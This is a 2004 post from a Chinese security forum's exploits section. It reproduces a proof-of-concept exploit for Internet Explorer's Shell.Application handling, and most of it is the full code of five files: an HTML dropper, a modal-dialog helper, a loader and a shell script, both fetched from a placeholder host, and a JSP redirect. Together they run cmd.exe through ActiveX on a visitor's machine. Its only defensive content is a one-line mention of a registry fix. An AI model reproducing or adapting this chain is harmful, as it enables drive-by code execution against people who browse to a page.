Microsoft Internet Explorer Remote Application.Shell Exploit

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6819
精华: 835
积分: 36108
阅读权限: 255
性别: 男
来自: 中国
在线时间: 584 小时
注册时间: 2004-6-25
最后登录: 2008-8-19

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-7-9 16:32 只看该作者

Microsoft Internet Explorer Remote Application.Shell Exploit

From: Oday Exploit

Proof of Concept Exploit by Jelmer
Solution : The IEFix.reg registry file will protect you from this new variant/exploit

----------------------------------------------------- installer.htm -------------------------------------------------------

复制内容到剪贴板

代码:

<html>

<body>



<script language="Javascript">



function InjectedDuringRedirection(){

showModalDialog(&#39;md.htm&#39;,window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;

dialogWidth:1\;").location="vbscript:\"<SCRIPT SRC=&#39;[url]http://ip/shellscript_loader.js[/url]&#39;><\/script>\"";

}



</script>



<script language="javascript">



setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);

setTimeout("myiframe.execScript(&#39;InjectedDuringRedirection()&#39;) ",101);

document.write(&#39;<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" style=display:none;></IFRAME>&#39;);



</script>



</body>

</html>

--------------------------------------------------------- md.htm ---------------------------------------------------------

复制内容到剪贴板

代码:

<SCRIPT language="javascript">



window.returnValue = window.dialogArguments;



function CheckStatus(){

try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}

setTimeout("CheckStatus()",100);

}



CheckStatus();



</SCRIPT>

--------------------------------------------------- shellscript_loader.js ---------------------------------------------------

复制内容到剪贴板

代码:

function getRealShell() {

myiframe.document.write("<SCRIPT SRC=&#39;[url]http://ip/shellscript.js[/url]&#39;><\/SCRIPT>");

}



document.write("<IFRAME ID=myiframe SRC=&#39;about:blank&#39; WIDTH=200 HEIGHT=200></IFRAME>");

setTimeout("getRealShell()",100);

------------------------------------------------------- shellscript.js -------------------------------------------------------

复制内容到剪贴板

代码:

function injectIt() {

document.frames[0].document.body.insertAdjacentHTML(&#39;afterBegin&#39;,&#39;injected<script language=

"JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>&#39;);

}

document.write(&#39;<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>&#39;);

setTimeout("injectIt()", 1000);

--------------------------------------------------------- redir.jsp ----------------------------------------------------------

复制内容到剪贴板

代码:

<% Thread.sleep(1500);

response.setStatus(302);

response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm"); 

%>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Microsoft Internet Explorer Remote Application.Shell Exploit